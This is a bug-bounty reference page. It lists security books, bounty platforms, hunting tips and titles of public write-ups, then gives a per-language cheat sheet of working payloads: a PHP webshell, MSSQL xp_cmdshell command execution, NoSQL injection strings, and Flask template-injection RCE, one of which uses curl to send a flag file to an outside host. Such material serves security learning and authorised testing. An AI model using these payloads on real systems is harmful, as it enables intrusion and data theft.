Introduction
My intention is to make a full and complete list of Vulnerability bounty write-up and resources and let Bug Bounty Hunter to use this page as a reference when they want to gain some insight for a particular kind of vulnerability during Bug Hunting, feel free to submit request. Okay, enough for chit-chatting, let’s get started.
Books
- Getting Started - Bug Bounty Hunter Methodology
- zseano’s methodology
- Web Hacking 101 by Peter Yaworski.
- Breaking into Information Security: Learning the Ropes 101 by Andy Gill.
- The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard and Marcus Pinto.
- Tangled Web by Michal Zalewski.
- OWASP Testing Guide v4 by OWASP Breakers community.
Mobile
- The Mobile Application Hacker’s Handbook by Dominic Chell et al.
- iOS Application Security: The Definitive Guide for Hackers and Developers by David Thiel.
Cryptography
- Crypto 101 by Laurens Van Houtven.
Penetration Testing
- The Art of Exploitation by Jon Erickson, 2008
- Metasploit: The Penetration Tester’s Guide by David Kennedy et al., 2011
- Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014
- Rtfm: Red Team Field Manual by Ben Clark, 2014
- The Hacker Playbook by Peter Kim, 2014
- The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013
- Professional Penetration Testing by Thomas Wilhelm, 2013
- Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012
- Violent Python by TJ O’Connor, 2012
- Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007
- Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014
- Penetration Testing: Procedures & Methodologies by EC-Council, 2010
- Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010
- Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014
- Bug Hunter’s Diary by Tobias Klein, 2011
- Advanced Penetration Testing by Wil Allsopp, 2017
Platforms
- YesWeHack
- intigriti
- HackerOne
- Bugcrowd
- Cobalt
- Bountysource
- Bounty Factory
- Coder Bounty
- FreedomSponsors
- FOSS Factory
- Synack
- HackenProof
- Detectify
- Bugbountyjp
- Safehats
- BugbountyHQ
- Hackerhive
- Hacktrophy
- AntiHACK
- CESPPA
Bug-Bounty-Tips
Tip #1
Use GIT as a recon tool. Find the target’s GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.
Tip #2
Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to /explore. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.
Tip #3
Bug bounty tip: test applications of a company that costs money or requires manual setup. Chances are only few to none would have tested it leaving it vulnerable.
Tip #4
If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO.
Tip #5
Look for hackathon-related assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times.
Tip #6
| Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports// | grep INSTALL.mysql.txt | grep 200 | less)/ |
Tip #7
When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. For example, demonstrating a CSRF can be exploited simply by using [img] tag is better than having to send a link to the victim.
Vulnerabilities
Cross-Site Scripting (XSS)
- Sleeping stored Google XSS Awakens a $5000 Bounty by Patrik Fehrenbach
- RPO that lead to information leakage in Google by filedescriptor
- God-like XSS, Log-in, Log-out, Log-in in Uber by Jack Whitton
- An XSS on Facebook via PNGs & Wonky Content Types by Jack Whitton
- he is able to make stored XSS from a irrelevant domain to main facebook domain
- Stored XSS in *.ebay.com by Jack Whitton
- Complicated, Best Report of Google XSS by Ramzes
- Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com by secgeek
- Command Injection in Google Console by Venkat S
- Facebook’s Moves - OAuth XSS by PAULOS YIBELO
- Stored XSS in Google Docs (Bug Bounty) by Harry M Gertos
- Stored XSS on developer.uber.com via admin account compromise in Uber by James Kettle (albinowax)
- Yahoo Mail stored XSS by Klikki Oy
- Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) by Masato Kinugawa
- Youtube XSS by fransrosen
- Best Google XSS again - by Krzysztof Kotowicz
- IE & Edge URL parsin Problem - by detectify
- Google XSS subdomain Clickjacking
- Google Japan Book XSS
- Flash XSS mega nz - by frans
- xss in google IE, Host Header Reflection
- Years ago Google xss
- xss in google by IE weird behavior
- xss in Yahoo Fantasy Sport
- xss in Yahoo Mail Again, worth $10000 by Klikki Oy
- Sleeping XSS in Google by securityguard
- Decoding a .htpasswd to earn a payload of money by securityguard
- Google Account Takeover
- AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2 by geekboy
- Uber Self XSS to Global XSS
- How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) by Marin MoulinierFollow
- Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities by Brett
- XSSI, Client Side Brute Force
- postMessage XSS Bypass
- XSS in Uber via Cookie by zhchbin
- Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP by frans
- XSS due to improper regex in third party js Uber 7k XSS
- XSS in TinyMCE 2.4.0 by Jelmer de Hen
- Pass uncoded URL in IE11 to cause XSS
- Twitter XSS by stopping redirection and javascript scheme by Sergey Bobrov
- Auth DOM Uber XSS
- XSS in www.yahoo.com
- Stored XSS, and SSRF in Google using the Dataset Publishing Language
- Stored XSS on Snapchat
- Researching Polymorphic Images for XSS on Google Scholar
- OLX Bug Bounty: Reflected XSS in 404 Page
Brute Force
- Web Authentication Endpoint Credentials Brute-Force Vulnerability by Arne Swinnen
- InstaBrute: Two Ways to Brute-force Instagram Account Credentials by Arne Swinnen
- How I Could Compromise 4% (Locked) Instagram Accounts by Arne Swinnen
- Possibility to brute force invite codes in riders.uber.com by r0t
- Brute-Forcing invite codes in partners.uber.com by Efkan Gökbaş (mefkan)
SQL Injection
- SQL injection in Wordpress Plugin Huge IT Video Gallery in Uber by glc
- SQL Injection on sctrack.email.uber.com.cn by Orange Tsai
- Yahoo – Root Access SQL Injection – tw.yahoo.com by Brett Buerhaus
- Multiple vulnerabilities in a WordPress plugin at drive.uber.com by Abood Nour (syndr0me)
- GitHub Enterprise SQL Injection by Orange
- Yahoo SQL Injection to Remote Code Exection to Root Privilege by Ebrahim Hegazy
Stealing Access Token
- Facebook Access Token Stolen by Jack Whitton -
Obtaining Login Tokens for an Outlook, Office or Azure Account by Jack Whitton
- Bypassing Digits web authentication’s host validation with HPP by filedescriptor
- Bypass of redirect_uri validation with /../ in GitHub by Egor Homakov
- Bypassing callback_url validation on Digits by filedescriptor
- Stealing livechat token and using it to chat as the user - user information disclosure by Mahmoud G. (zombiehelp54)
- Change any Uber user’s password through /rt/users/passwordless-signup - Account Takeover (critical) by mongo (mongo)
- Internet Explorer has a URL problem, on GitHub by filedescriptor.
- How I made LastPass give me all your passwords by labsdetectify
- Steal Google Oauth in Microsoft
- Steal FB Access Token
- Paypal Access Token Leaked
- Steal FB Access Token
- Appengine Cool Bug
- Slack post message real life experience
- Bypass redirect_uri by nbsriharsha
- Stealing Facebook Messenger nonce worth 15k
- Steal Oculus Nonce and Oauth Flow Bypass
Google oauth bypass
CSRF
- Messenger.com CSRF that show you the steps when you check for CSRF by Jack Whitton
- Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) by Florian Courtial
- Hacking PayPal Accounts with one click (Patched) by Yasser Ali
- Add tweet to collection CSRF by vijay kumar
- Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun by phwd
- How i Hacked your Beats account ? Apple Bug Bounty by @aaditya_purani
- FORM POST JSON: JSON CSRF on POST Heartbeats API by Dr.Jones
- Hacking Facebook accounts using CSRF in Oculus-Facebook integration
Remote Code Execution
- JDWP Remote Code Execution in PayPal by Milan A Solanki
- XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook’s servers by Reginaldo Silva
- How I Hacked Facebook, and Found Someone’s Backdoor Script by Orange Tsai
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! by Orange Tsai
- uber.com may RCE by Flask Jinja2 Template Injection by Orange Tsai
- Yahoo Bug Bounty - *.login.yahoo.com Remote Code Execution by Orange Tsai (Sorry its in Chinese Only)
- How we broke PHP, hacked Pornhub and earned $20,000 by Ruslan Habalov
- Alert, God-like Write-up, make sure you know what is ROP before clicking, which I don’t =(
- RCE deal to tricky file upload by secgeek
- WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic by Cure53 (cure53)
- Read-Only user can execute arbitraty shell commands on AirOS by 93c08539 (93c08539)
- Remote Code Execution by impage upload! by Raz0r (ru_raz0r)
- Popping a shell on the Oculus developer portal by Bitquark
- Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit - 10,000$ by 5haked
- PayPal Node.js code injection (RCE) by Michael Stepankin
- eBay PHP Parameter Injection lead to RCE
- Yahoo Acqusition RCE
- Command Injection Vulnerability in Hostinger by @alberto__segura
- RCE in Airbnb by Ruby Injection by buerRCE
- RCE in Imgur by Command Line
- RCE in git.imgur.com by abusing out dated software by Orange Tsai
- RCE in Disclosure
- Remote Code Execution by struct2 Yahoo Server
- Command Injection in Yahoo Acquisition
- $50k RCE in JetBrains IDE
- Telekom.de Remote Command Execution! by Ebrahim Hegazy
- Magento Remote Code Execution Vulnerability! by Ebrahim Hegazy
- Yahoo! Remote Command Execution Vulnerability by Ebrahim Hegazy
Deserialization
- Java Deserialization in manager.paypal.com by Michael Stepankin
- Instagram’s Million Dollar Bug by Wesley Wineberg
- (Ruby Cookie Deserialization RCE on facebooksearch.algolia.com by Michiel Prins (michiel)
- Java deserialization by meals
Image Tragick
- Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition) by NaHamSec
- Exploting ImageMagick to get RCE on HackerOne by c666a323be94d57
- Trello bug bounty: Access server’s files using ImageTragick by Florian Courtial
- 40k fb rce
- Yahoo Bleed 1
- Yahoo Bleed 2
Direct Object Reference (IDOR)
- Trello bug bounty: The websocket receives data when a public company creates a team visible board by Florian Courtial
- Trello bug bounty: Payments informations are sent to the webhook when a team changes its visibility by Florian Courtial
- Change any user’s password in Uber by mongo
- Vulnerability in Youtube allowed moving comments from any video to another by secgeek
- It’s Google Vulnerability, so it’s worth reading, as generally it is more difficult to find Google vulnerability
- Twitter Vulnerability Could Credit Cards from Any Twitter Account by secgeek
- One Vulnerability allowed deleting comments of any user in all Yahoo sites by secgeek
- Microsoft-careers.com Remote Password Reset by Yaaser Ali
- How I could change your eBay password by Yaaser Ali
- Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication by Duo Labs
- How I got access to millions of [redacted] accounts
- All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description by Enguerran Gillier (opnsec)
- Urgent: attacker can access every data source on Bime by Jobert Abma (jobert)
- Downloading password protected / restricted videos on Vimeo by Gazza (gazza)
- Get organization info base on uuid in Uber by Severus (severus)
- How I Exposed your Primary Facebook Email Address (Bug worth $4500) by Roy Castillo
- DOB disclosed using “Facebook Graph API Reverse Engineering” by Raja Sekar Durairaj
- Change the description of a video without publish_actions permission in Facebook by phwd
- Response To Request Injection (RTRI) by ?, be honest, thanks to this article, I have found quite a few bugs because of using his method, respect to the author!
- Leak of all project names and all user names , even across applications on Harvest by Edgar Boda-Majer (eboda)
- Changing paymentProfileUuid when booking a trip allows free rides at Uber by Matthew Temmy (temmyscript)
- View private tweet
Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User by Stephen SclafaniHacking Facebook’s Legacy API, Part 2: Stealing User Sessions by Stephen Sclafani- Delete FB Video
- Delete FB Video
- Viewing private Airbnb Messages
- IDOR tweet as any user by kedrisec
- Mass Assignment, Response to Request Injection, Admin Escalation by sean
- Getting any Facebook user’s friend list and partial payment card details
- Manipulation of ETH balance
XXE
- How we got read access on Google’s production servers by detectify
- Blind OOB XXE At UBER 26+ Domains Hacked by Raghav Bisht
- XXE through SAML
- XXE in Uber to read local files
Unrestricted File Upload
- File Upload XSS in image uploading of App in mopub by vijay kumar
- RCE deal to tricky file upload by secgeek
- File Upload XSS in image uploading of App in mopub in Twitter by vijay kumar (vijay_kumar1110)
Server Side Request Forgery (SSRF)
- ESEA Server-Side Request Forgery and Querying AWS Meta Data by Brett Buerhaus
- SSRF to pivot internal network
- SSRF to LFI
- SSRF to query google internal server
- SSRF by using third party Open redirect by Brett BUERHAUS
- SSRF tips from BugBountyHQ of Images
- SSRF to RCE
- XXE at Twitter
- Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface
- Plotly AWS Metadata SSRF (and a stored XSS)
Race Condition
- Race conditions on Facebook, DigitalOcean and others (fixed) by Josip Franjković
- Race Conditions in Popular reports feature in HackerOne by Fábio Pires (shmoo)
- Hacking Starbuck for unlimited money by Egor Homakov
Business Logic Flaw
- How I Could Steal Money from Instagram, Google and Microsoft by Arne Swinnen
- Facebook - bypass ads account’s roles vulnerability 2015 by POUYA DARABI
- Uber Eat for Free by
Authentication Bypass
- OneLogin authentication bypass on WordPress sites via XMLRPC in Uber by Jouko Pynnönen (jouko)
- 2FA PayPal Bypass by henryhoggard
- SAML Bug in Github worth 15000
- Authentication bypass on Airbnb via OAuth tokens theft
- Administrative Panel Access by c0rni3sm
- Flickr Oauth Misconfiguration by mishre
- Slack SAML authentication bypass by Antonio Sanso
- Shopify admin authentication bypass using partners.shopify.com by uzsunny
HTTP Header Injection
- Twitter Overflow Trilogy in Twitter by filedescriptor
- Twitter CRLF by filedescriptor
- Adblock Plus and (a little) more in Google
- $10k host header by Ezequiel Pereira
Subdomain Takeover
- Hijacking tons of Instapage expired users Domains & Subdomains by geekboy
- Reading Emails in Uber Subdomains
- Slack Bug Journey - by David Vieira-Kurz
- Subdomain takeover and chain it to perform authentication bypass by Arne Swinnen
- Hacker.One Subdomain Takeover - by geekboy
XSSI
- Plain Text Reading by XSSI
- JSON hijacking
- OWASP XSSI
- Japan Identifier based XSSI attacks
- JSON Hijack Slide
Email Related
- This domain is my domain - G Suite A record vulnerability
- I got emails - G Suite Vulnerability
- How I snooped into your private Slack messages [Slack Bug bounty worth $2,500]
- Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000]
- Slack Yammer Takeover by using TicketTrick by Inti De Ceukelaire
- How I could have mass uploaded from every Flickr account!
Money Stealing
Local File Inclusion
- Disclosure Local File Inclusion by Symlink
- Facebook Symlink Local File Inclusion
- Gitlab Symlink Local File Inclusion
- Gitlab Symlink Local File Inclusion Part II
- Multiple Company LFI
- LFI by video conversion, excited about this trick!
Miscellaneous
- SAML Pen Test Good Paper
- A list of FB writeup collected by phwd by phwd
- NoSQL Injection by websecurify
- CORS in action
- CORS in Fb messenger
- Web App Methodologies
- XXE Cheatsheet
- The road to hell is paved with SAML Assertions, Microsoft Vulnerability
- Study this if you like to learn Mongo SQL Injection by cirw
- Mongo DB Injection again by websecrify
- w3af speech about modern vulnerability by w3af
- Web cache attack that lead to account takeover
- A talk to teach you how to use SAML Raider
- XSS Checklist when you have no idea how to exploit the bug
- CTF write up, Great for Bug Bounty
- It turns out every site uses jquery mobile with Open Redirect is vulnerable to XSS by sirdarckcat
- Bypass CSP by using google-analytics
- Payment Issue with Paypal
- Browser Exploitation in Chinese
- XSS bypass filter
- Markup Impropose Sanitization
- Breaking XSS mitigations via Script Gadget
- X41 Browser Security White Paper
- Bug Bounty Cheatsheets By EdOverflow
- Messing with the Google Buganizer System for $15,600 in Bounties
- Electron Security White Paper
- Twitter’s Vine Source code dump - $10080
- SAML Bible
- Bypassing Google’s authentication to access their Internal Admin panels — Vishnu Prasad P G
- Smart Contract Vulnerabilities
Vulnerabilities-types
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
Client side:
XSS
CSRF
session fixation
open redirects
header injection
websockets / localStorage tests
websockets hijacking
jsonp leaks
OAuth token theft
path-relative stylesheet import
same origin method execution
http response splitting/smuggling
names and email addresses appearing in HTML comments
reverse tabnabbing
referer token leakage
Server side:
Injections:
+ sql / nosql
+ cmd
+ expression language (https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf)
+ template injection
+ Server Side Include (.shtml)
+ server side javascript execution
+ ldap
+ CSS
+ extract attributes with input[value^=""]
+ extract whatever with fonts (https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
+ mail header
+ xpath
+ log injection
+ OGNL
SSRF
XXE
misconfig:
+ cors
+ host header manipulation
+ host header poisoning (https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html)
+ TRACE enabled
+ clickjacking
+ session timeouts
+ login throttling (anti-bruteforce)
+ _method=PUT etc checks (csrf bypass...)
+ cross-domain policy
+ cookie scope
+ sensitive data in url
+ directory listings
+ caching of sensitive data
+ backdoor cookies/parameters
+ SMTP not checking server identity
+ methods not checked/restricted (GET, PUT etc)
path traversal
local/remote file inclusion
file upload
auth bypass
+ pass reset: the same token for all users (in given second)
parameter pollution
race conditions
user enumeration
mass assignments / autobinding / Object injection
regex bypass/eval/dos ([a-zA-Z]+)*, (a+)+ or (a|a?)+ etc)
search indexing of credentials (private data cached by google etc)
memory leaks:
- https://github.com/neex/gifoeb
subdomain takeover:
-unused subdomains and aliases (CNAME)
-CNAME pointing to unregistered domain
-trailing dots (bypassess in cloud providers)
password bruteforce
- https://hackerone.com/reports/127844
httpoxy (mostly php 7.0.8)
path equivalence vulnerability
image tragic
insecure direct object reference
session puzzling
smtp header injection
deserialization
rounding errors / integer overflows
cache-deception
table truncation
hidden files (.git, .DS_Store)
broken logout functions
format string (%s, %d, {0:x})
bad hexadecimal concatenation (when two different hashes are converted to the same value)
null byte injection
pdf export injection (https://securityonline.info/export-injection-new-server-side-vulnerability/)
csv injection
side-channel leaks with f.e. Chrome Auditor or Windows Defender (https://github.com/icchy/wctf2019-gtf)
old (open)ssl
utf8 normalization/Case Mapping Collisions (utf.toLower() == some_ascii) (https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/)
Languages
PHP
- file extensions (most servers parse them as php)
- .pht
- .phtml
- php3
- php4
- non-common php tags
<script language="php"></script><% %><?=
- shell without letters/numbers
1 2
<?=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); # <?=$_GET[_]($_GET[__]); - parse_url function
- readfile + windows -> filenames blacklist bypass via 8.3 filenames
- preg_match -> bypass via pcre.backtrack_limit
- create text that will force recursion in vulnerable regex
- it will fail with warning possibly bypassing protections like
1 2 3
if(preg_match("", $_POST['input']) == 0) { // process user input... }
- type juggling / weak comparison operator
- base_dir bypass:
SplFileObject
$file = new SplFileObject("/var/www/html/blabla/test.php", "w"); $file->fwrite('shell');pcntl_exec
pcntl_exec("/bin/bash", "&pkill -9 bash >out");echo file_get_contents("out");- linkinfo, realpath <= 5.3.6
- symlinks
- mail() + logs
- chdir(base_dir,…)
1
ini_set('open_basedir','..');chdir('..');chdir('..');ini_set('open_basedir','/');
- disable_functions bypass
- disallow file write access bypass
- code evaluation
- complex (curly) syntax
- heredoc syntax
- user-supplied values in double-quotes
- eval
- create_function
- preg_replace with /e
- assert is eval
- extract is evil
&q=fake&sql=fake&query=fake&db=fake&host=fake
- object instantation
1 2
$model = $_GET['model']; $object = new $model();
- unlink with wrong folder don’t work? (https://rdot.org/forum/showthread.php?t=3102)
- image resize bypass
- basic auth with vulnerable
<limit>bypass - LFI/RFI wrappers
- input
- data
data://text/plain;base64,command | data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== - filter
php://filter/convert.base64-encode/resource=index.php - file
- zip
zip://zipfile#php_file.php - phar
- expect
- glob
- iconv
- crypto
- gopher
- fd
- telnet
- ftp
- tftp
- nntp
- jar
- scp
- ssh
- ssh2
- ldap
- dict
- ogg
- LFI to RCE
- Using file upload forms/functions
- Wrappers
- Files
- /proc/self/environ
- /proc/self/fd
- Log files with controllable input:
- /var/log/apache2/access.log
- /var/log/apache2/error.log
- /var/log/vsftpd.log
- /var/log/sshd.log
- /var/log/mail
- /var/lib/nginx/cache
- PHPInfo script
- php sessions
- Endings:
- null byte
- truncation
- tmp files with self inclusion
- common files
- phpunit.xml.dst (in LAMP)
- webshell using POST files
<? `. /*/*J;` // will execute when there is /tmp/*J file with your POST data - Inject SESSION data
curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah' -F 'file=@/etc/passwd'
Java
- /jmx-console
- /web-console/Invoker
- /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet
- Java Naming and Directory Service at ports 1098, 1099
- RMI at port 4444, 1099
- directly accessible jsp files (vs struts actions)
- struts
- dmi:
?method:somePublicMethodToCall=1, /action!method.do?username=value - extensions: .action, .do, .go
- actions with user controlled input, like:
1 2 3 4 5 6
<action name="someAction" class="com.SomeAction" method="DoSomething"> <result name="typeResult" type="dispatcher"> <param name="location">/resources/${theType}.jsp</param> </result> </action> Now read files with ?method:getAnyString&anyString=typeResult&theType=../WEB-INF/web.xml? - getText(user_input) -> ognl injection
- dmi:
- spring
- mass assignment because of (@modelAttribute)[http://agrrrdog.blogspot.com/2017/03/autobinding-vulns-and-spring-mvc.html]
- injections:
%{3*2} ${3*5} ${%{4*5}} ${T(java.lang.Runtime).getRuntime().exec("cmd.exe")} - jsessionid in url parameter rewrited to response (html response splitting)
- regexs to check
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46
java.lang.ClassLoader.defineClass java.net.URLClassLoader java.beans.Instrospector.getBeanInfo openConnection getResource java.io.FileInputStream java.io.FileOutputStream java.io.FileReader java.io.FileWriter java.io.RandomAccessFile System.load System.loadLibrary exec ProcessBuilder getRuntime ObjectInputStream readObject readObjectNodData readResolve readExternal XMLDecoder xstream.fromXML ObjectInputStream.readUnshared enableDefaultTyping JsonTypeInfo.Id.CLASS JsonTypeInfo.Id.MINIMAL_CLASS freemarker.template.Template javax.script.ScriptEngine.eval ServletDispatcherResult createNativeQuery isELIgnored=false getELContext createValueExpression parseExpression ognlUtil.getValue ScriptEngineManager ELAsString spring:eval SSLContext.getInstance("SSL") -> SSLContext.getInstance("TLS") getSession().setAttribute - sonar rules
1 2
LDAP serialization entities Persistent entities with @RequestMapping
- jsp include injection
1 2
<%@include file="" %> <jsp:include page=""/>
- server side redirects
1 2 3
request.getRequestDispatcher("./"+user_input+".jsp").include(request, response) // with user_input == "applicationContext.xml?"" return new ModelAndView(user_input); Return new ActionForward(user_input);
SQL
- hex encoding
- union select X’31333337’ -> union select 1337
- charsets big5, cp932, gb2312, gbk and sjis
- Hibernate + H2 db: non-breaking-space is not recognized by Hibernate
- WAF bypass with %0b,%0c,0%a, /**/, like that: sel%0bect
- oracle db
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
# rce EXEC master..sp_configure 'show advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'show advanced options',0; RECONFIGURE WITH OVERRIDE; DECLARE @result TABLE (asd VARCHAR(512)); declare @cmd nvarchar(1000); DECLARE @data VARCHAR(8000); set @cmd = \''''+cmd+'''\'; INSERT INTO @result execute xp_cmdshell @cmd; SELECT @data = asd FROM @result; SELECT 'output: '+@data AS output INTO rce_result; # hex encoded payload execute DECLARE @S VARCHAR(4000); SET @S=CAST(payload_in_hex AS VARCHAR(4000)); EXEC(@S); - bypass comments
selet * from x where /*!user='admin'*/ -> or /*+*/ - unicode in mysql
mysqli_set_charset($conn,"utf8"); select 'admin' = 'àdmin'; # will return 1
NOSql
- arrays:
{"$gt": ""}, &input[$ne]=1
- horizontal auth bruteforce:
user[$in][]=admin&user[$in][]=user&pass=abc123 ; {user: {"$in": ["admin", "user"]}}user[$regex]=a&pass=abc123
db.run(user input)is like classical sql injection- JavaScript code can execute within the database engine inside:
- $where
- group
- map-reduce
- protection:
- getting rid of the qs module
- payloads:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
# mostly from https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt (function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<10000); return Math.max();})() '0; return true' '0; while(true){}' true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1' 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00 {$gt: ''} [$ne]=1 ';sleep(5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
Python
- url_parse in python problem with path params
(http://example.com?asd;xxx) - upload __init__.py file + import
- app.secret_key in flask -> you know it, you can spoof session cookies
- flaks SSTI:
from_string,render_template_string, templates with non-common extension have disabled auto-escaping - flask sqlalchemy injection:
sqlalchemy.expression.text,execute - flask threading:
gand_context_are tricky - flask uses his error pages only for specified addresses, including 127.0.0.1
- flask rce payloads
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
{% for x in {}.__class__.__base__.__subclasses__() %}{% if hasattr(x,'_module') %}{{x._module.__builtins__['__import__']('os').system("ls")}}{% endif %}{% endfor %} {% set loadedClasses = " ".__class__.__mro__[2].__subclasses__() %} {% for loadedClass in loadedClasses %} {% if loadedClass.__name__ == "catch_warnings".strip() %} {% set builtinsReference = loadedClass()._module.__builtins__ %} {% set os = builtinsReference["__import__".strip()]("subprocess".strip()) %} {{ os.check_output("cat sha4/flag_bilaabluagbiluariglublaireugrpoop".strip(), shell=True) }} {% endif %} {% endfor %} {{config}} {{ url_for.globals.current_app.config }} {% for key in ''['__class__']['__mro__'][1]['__subclasses__']() %} {% if key['__name__'] == "Popen" %} {% if key("curl 908337901:8001 -d $(/readflag)", shell=True, stdout=-1)['communicate']()[0] %} {% endif %} {% endif %} {% endfor %} - objects comparison:
"1">5 -> True - format is exploitable:
'{your_input}'.format(some_python_object)like'{0.__class__}'.format(object) - web cache dirs:
1 2 3
/__pycache__/__init__.cpython-35.pyc /__pycache__/conf.cpython-35.pyc /__pycache__/app.cpython-35.pyc
Werkzeug debbuger
we can replace ‘\x0a’ with ‘\x0d’, it still will be correct python script (useful when getting code with
input())its possible to send urlencoded data as path, i.e. “GET /%41%41%41 HTTP/1.1” == “GET /AAA HTTP/1.1” (at least in flask dev)
- default args are evaluated only once
1 2 3 4 5 6 7 8 9
def foo(a=[]): a.append("X") return a In [1]: foo() Out[1]: ['x'] In [2]: foo() Out[2]: ['x', 'x']
exception handling,
except ValueError, IndexError:will catch only ValueError- numpy not always clears memory, f.e.
np.empty()
Ruby
- URI(params[:url]).scheme == ‘http’ bypass by creating ‘http’ dir
open(params[:url]) -> rce with |ls
Perl
- params pollution (
$x=asd&$x=fre -> array) - dicts are expanded with arrays
- can be broken in many ways: Camel, Camel strikes back
Bash
- no white spaces:
{echo,a,b}; echo$FISa$FISb - num bases
"obase=16; 11" | bc$((16#111))
- cmd without letters/numbers
1 2
/???/??? ./ # /bin/cat ./
- Bash reads scripts (in chunks)[https://thomask.sdf.org/blog/2019/11/09/take-care-editing-bash-scripts.html]. So editing a script when it is running may cause some problems.
node.js
- create Buffer(x) with x as number will create Buffer with x bytes of uninitialized memory -> memory leak
- eval, setTimeOut, setInterval, unserialize, exec
- parameters pollution, params are concatenate with “,”
- payloads
1
require('fs').readFile('/etc/passwd',function(err,data){if(!err){res.end(data.toString())}}) - check for debug mode: https://app/%2
- comparison operators: == doesn’t checks types
- anty-xss: npm install html-entities
- find vulnerable packages: snyk, node-check, nsp
- static code analysis: NodeJsScan
- SQLi with brackets and template filters:
correct: const result = await req.db.all `SELECT id, title FROM notes WHERE id = ${req.params.noteId}`; vuln: const result = await req.db.run(`SELECT id, title FROM notes WHERE id = ${req.params.noteId}`); - utf8 path traversal
var path = req.query.path; if (path.indexOf("..") == -1) { get_cos(path, callback); } // http://example.pl/sandbox/NN/passwd // N to U+FF2E - square brackets with user data are vuln:
whatever[user_input] = user_input2 - best practices
React/Electron
XSSes (cheatsheet)
ReactDOM.render(payload_here, something)- Controll over tag/props/childres
userInput.tag, [userInput.props] [...userInput.children] ) is same as: <userInput.tag {...userInput.props}>{userInput.children}</userInput.tag> <script>window.__STATE__ = ${JSON.stringify({ data })}</script><a href="payload_here"></a> (src, srcdoc, ...)dangerouslySetTheInnerHTMLReact.useRef- DOM manipulation
GrapQL
ASP NET (dotnet)
- insecure json deserialization with TypeNameHandlings